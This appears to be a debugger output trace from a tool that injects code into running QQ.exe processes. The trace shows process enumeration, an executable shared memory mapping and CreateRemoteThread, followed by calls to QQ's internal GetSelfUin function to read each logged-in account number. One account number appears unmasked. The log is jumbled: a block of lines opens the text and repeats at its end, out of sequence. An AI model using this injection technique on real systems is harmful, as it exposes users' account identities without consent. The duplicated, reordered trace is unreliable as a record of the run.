00000148 10.54989052 [5112] MyIAT:CreateRemoteThread (hProcess1,0,0,ViewBase1,0,0,0)
00000149 10.55005360 [5112] MyIAT:WaitForSingleObject (hRemoteThread,INFINITE)
00000150 10.55031776 [5988] Debug mode!
00000151 10.55035591 [5988] injectIAT:GetModuleHandleA ("KernelUtil.dll")
00000152 10.55038071 [5988] injectIAT:GetProcAddress (eax,"?GetSelfUin@Contact@Util@@YAKXZ")
00000153 10.55056095 [5112] MyIAT:GetExitCodeThread (hRemoteThread,addr Return_Value)
00000154 10.55061531 [5112] MyIAT:wsprintfA (addr @QQUid,"获取到QQ号:%d",Return_Value)
00000155 10.55064774 [5112] MyIAT:OutputDebugStringA (addr @QQUid)
00000156 10.55067635 [5112] 获取到QQ号:xxxxxx隐藏
00000157 10.55070591 [5112] MyIAT:CloseHandle (hRemoteThread)
00000158 10.55073643 [5112] MyIAT:CloseHandle (hProcess1)
00000159 10.55076599 [5112] MyIAT:Process32Next (handle,addr info)
00000160 10.55080891 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000161 10.55084229 [5112] MyIAT:Process32Next (handle,addr info)
00000162 10.55088806 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000163 10.55091858 [5112] MyIAT:Process32Next (handle,addr info)
00000164 10.55095577 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000165 10.55098629 [5112] MyIAT:Process32Next (handle,addr info)
00000166 10.55102444 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000167 10.55105495 [5112] MyIAT:Process32Next (handle,addr info)
00000168 10.55109310 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000169 10.55112267 [5112] MyIAT:Process32Next (handle,addr info)
00000170 10.55116081 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000171 10.55119133 [5112] MyIAT:Process32Next (handle,addr info)
00000172 10.55123043 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000173 10.55125999 [5112] MyIAT:Process32Next (handle,addr info)
00000174 10.55129528 [5112] MyIAT:CloseHandle (handle)
00000175 10.55133057 [5112] MyIAT:CloseHandle (hProcess2)
00000005 10.53904152 [5112] MyIAT:CreateFileMappingA (INVALID_HANDLE_VALUE,NULL,PAGE_EXECUTE_READWRITE,0,1024*4,NULL)
00000006 10.53908825 [5112] MyIAT:GetCurrentProcessId ()
00000007 10.53913784 [5112] MyIAT:OpenProcess (PROCESS_ALL_ACCESS,FALSE,eax)
00000008 10.53917313 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000009 10.53923798 [5112] MyIAT:RtlMoveMemory (ViewBase2,radr,injectCodelen)
00000010 10.53926563 [5112] MyIAT:CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS,0)
00000011 10.54169750 [5112] MyIAT:Process32First (handle,addr info)
00000012 10.54172421 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000013 10.54194260 [5112] MyIAT:Process32Next (handle,addr info)
00000014 10.54199123 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000015 10.54202461 [5112] MyIAT:Process32Next (handle,addr info)
00000016 10.54206276 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000017 10.54209423 [5112] MyIAT:Process32Next (handle,addr info)
00000018 10.54213047 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000019 10.54216290 [5112] MyIAT:Process32Next (handle,addr info)
00000020 10.54220104 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000021 10.54223156 [5112] MyIAT:Process32Next (handle,addr info)
00000022 10.54226780 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000023 10.54229736 [5112] MyIAT:Process32Next (handle,addr info)
00000024 10.54233360 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000025 10.54236412 [5112] MyIAT:Process32Next (handle,addr info)
00000026 10.54240036 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000027 10.54243088 [5112] MyIAT:Process32Next (handle,addr info)
00000028 10.54246712 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000029 10.54249859 [5112] MyIAT:Process32Next (handle,addr info)
00000030 10.54253387 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000031 10.54256439 [5112] MyIAT:Process32Next (handle,addr info)
00000032 10.54260063 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000033 10.54263020 [5112] MyIAT:Process32Next (handle,addr info)
00000034 10.54266548 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000035 10.54269600 [5112] MyIAT:Process32Next (handle,addr info)
00000036 10.54273129 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000037 10.54276276 [5112] MyIAT:Process32Next (handle,addr info)
00000038 10.54279709 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000039 10.54282856 [5112] MyIAT:Process32Next (handle,addr info)
00000040 10.54286480 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000041 10.54293251 [5112] MyIAT:Process32Next (handle,addr info)
00000042 10.54296970 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000043 10.54300022 [5112] MyIAT:Process32Next (handle,addr info)
00000044 10.54304123 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000045 10.54307461 [5112] MyIAT:Process32Next (handle,addr info)
00000046 10.54310989 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000047 10.54313946 [5112] MyIAT:Process32Next (handle,addr info)
00000048 10.54317570 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000049 10.54320717 [5112] MyIAT:Process32Next (handle,addr info)
00000050 10.54324436 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000051 10.54327393 [5112] MyIAT:Process32Next (handle,addr info)
00000052 10.54330921 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000053 10.54333973 [5112] MyIAT:Process32Next (handle,addr info)
00000054 10.54337502 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000055 10.54340553 [5112] MyIAT:Process32Next (handle,addr info)
00000056 10.54344177 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000057 10.54347229 [5112] MyIAT:Process32Next (handle,addr info)
00000058 10.54350662 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000059 10.54353809 [5112] MyIAT:Process32Next (handle,addr info)
00000060 10.54357433 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000061 10.54360485 [5112] MyIAT:Process32Next (handle,addr info)
00000062 10.54364014 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000063 10.54367065 [5112] MyIAT:Process32Next (handle,addr info)
00000064 10.54370689 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000065 10.54373550 [5112] MyIAT:Process32Next (handle,addr info)
00000066 10.54377079 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000067 10.54380226 [5112] MyIAT:Process32Next (handle,addr info)
00000068 10.54383755 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000069 10.54386806 [5112] MyIAT:Process32Next (handle,addr info)
00000070 10.54390335 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000071 10.54393291 [5112] MyIAT:Process32Next (handle,addr info)
00000072 10.54396820 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000073 10.54399872 [5112] MyIAT:Process32Next (handle,addr info)
00000074 10.54427528 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000075 10.54431629 [5112] MyIAT:Process32Next (handle,addr info)
00000076 10.54435539 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000077 10.54438496 [5112] MyIAT:Process32Next (handle,addr info)
00000078 10.54442024 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000079 10.54445171 [5112] MyIAT:Process32Next (handle,addr info)
00000080 10.54448795 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000081 10.54451752 [5112] MyIAT:Process32Next (handle,addr info)
00000082 10.54455280 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000083 10.54458332 [5112] MyIAT:Process32Next (handle,addr info)
00000084 10.54461861 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000085 10.54464912 [5112] MyIAT:Process32Next (handle,addr info)
00000086 10.54468441 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000087 10.54471493 [5112] MyIAT:Process32Next (handle,addr info)
00000088 10.54475021 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000089 10.54477978 [5112] MyIAT:Process32Next (handle,addr info)
00000090 10.54481506 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000091 10.54484558 [5112] MyIAT:Process32Next (handle,addr info)
00000092 10.54488277 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000093 10.54491138 [5112] MyIAT:Process32Next (handle,addr info)
00000094 10.54494762 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000095 10.54497719 [5112] MyIAT:Process32Next (handle,addr info)
00000096 10.54501247 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000097 10.54504395 [5112] MyIAT:Process32Next (handle,addr info)
00000098 10.54507923 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000099 10.54510880 [5112] MyIAT:Process32Next (handle,addr info)
00000100 10.54514408 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000101 10.54517365 [5112] MyIAT:Process32Next (handle,addr info)
00000102 10.54521084 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000103 10.54524136 [5112] MyIAT:Process32Next (handle,addr info)
00000104 10.54527664 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000105 10.54530716 [5112] MyIAT:Process32Next (handle,addr info)
00000106 10.54534245 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000107 10.54537201 [5112] MyIAT:Process32Next (handle,addr info)
00000108 10.54540825 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000109 10.54543972 [5112] MyIAT:Process32Next (handle,addr info)
00000110 10.54547501 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000111 10.54550457 [5112] MyIAT:Process32Next (handle,addr info)
00000112 10.54554081 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000113 10.54557037 [5112] MyIAT:Process32Next (handle,addr info)
00000114 10.54560471 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000115 10.54563618 [5112] MyIAT:Process32Next (handle,addr info)
00000116 10.54567146 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000117 10.54570198 [5112] MyIAT:Process32Next (handle,addr info)
00000118 10.54573727 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000119 10.54576683 [5112] MyIAT:Process32Next (handle,addr info)
00000120 10.54580212 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000121 10.54583263 [5112] MyIAT:Process32Next (handle,addr info)
00000122 10.54586792 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000123 10.54589844 [5112] MyIAT:Process32Next (handle,addr info)
00000124 10.54593468 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000125 10.54596519 [5112] MyIAT:Process32Next (handle,addr info)
00000126 10.54600143 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000127 10.54603195 [5112] MyIAT:Process32Next (handle,addr info)
00000128 10.54607105 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000129 10.54610252 [5112] MyIAT:Process32Next (handle,addr info)
00000130 10.54613876 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000131 10.54617119 [5112] MyIAT:OpenProcess (4095,0,info.th32ProcessID)
00000132 10.54664135 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000133 10.54668427 [5112] MyIAT:CreateRemoteThread (hProcess1,0,0,ViewBase1,0,0,0)
00000134 10.54684258 [5112] MyIAT:WaitForSingleObject (hRemoteThread,INFINITE)
00000135 10.54902363 [5216] Debug mode!
00000136 10.54912949 [5216] injectIAT:GetModuleHandleA ("KernelUtil.dll")
00000137 10.54917145 [5216] injectIAT:GetProcAddress (eax,"?GetSelfUin@Contact@Util@@YAKXZ")
00000138 10.54944611 [5112] MyIAT:GetExitCodeThread (hRemoteThread,addr Return_Value)
00000139 10.54951668 [5112] MyIAT:wsprintfA (addr @QQUid,"获取到QQ号:%d",Return_Value)
00000140 10.54955769 [5112] MyIAT:OutputDebugStringA (addr @QQUid)
00000141 10.54959297 [5112] 获取到QQ号:1067968022
00000142 10.54962349 [5112] MyIAT:CloseHandle (hRemoteThread)
00000143 10.54966354 [5112] MyIAT:CloseHandle (hProcess1)
00000144 10.54969597 [5112] MyIAT:Process32Next (handle,addr info)
00000145 10.54974365 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000146 10.54979992 [5112] MyIAT:OpenProcess (4095,0,info.th32ProcessID)
00000147 10.54984188 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000148 10.54989052 [5112] MyIAT:CreateRemoteThread (hProcess1,0,0,ViewBase1,0,0,0)
00000149 10.55005360 [5112] MyIAT:WaitForSingleObject (hRemoteThread,INFINITE)
00000150 10.55031776 [5988] Debug mode!
00000151 10.55035591 [5988] injectIAT:GetModuleHandleA ("KernelUtil.dll")
00000152 10.55038071 [5988] injectIAT:GetProcAddress (eax,"?GetSelfUin@Contact@Util@@YAKXZ")
00000153 10.55056095 [5112] MyIAT:GetExitCodeThread (hRemoteThread,addr Return_Value)
00000154 10.55061531 [5112] MyIAT:wsprintfA (addr @QQUid,"获取到QQ号:%d",Return_Value)
00000155 10.55064774 [5112] MyIAT:OutputDebugStringA (addr @QQUid)
00000156 10.55067635 [5112] 获取到QQ号:xxxxxx隐藏
00000157 10.55070591 [5112] MyIAT:CloseHandle (hRemoteThread)
00000158 10.55073643 [5112] MyIAT:CloseHandle (hProcess1)
00000159 10.55076599 [5112] MyIAT:Process32Next (handle,addr info)
00000160 10.55080891 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000161 10.55084229 [5112] MyIAT:Process32Next (handle,addr info)
00000162 10.55088806 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000163 10.55091858 [5112] MyIAT:Process32Next (handle,addr info)
00000164 10.55095577 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000165 10.55098629 [5112] MyIAT:Process32Next (handle,addr info)
00000166 10.55102444 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000167 10.55105495 [5112] MyIAT:Process32Next (handle,addr info)
00000168 10.55109310 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000169 10.55112267 [5112] MyIAT:Process32Next (handle,addr info)
00000170 10.55116081 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000171 10.55119133 [5112] MyIAT:Process32Next (handle,addr info)
00000172 10.55123043 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000173 10.55125999 [5112] MyIAT:Process32Next (handle,addr info)
00000174 10.55129528 [5112] MyIAT:CloseHandle (handle)
00000175 10.55133057 [5112] MyIAT:CloseHandle (hProcess2)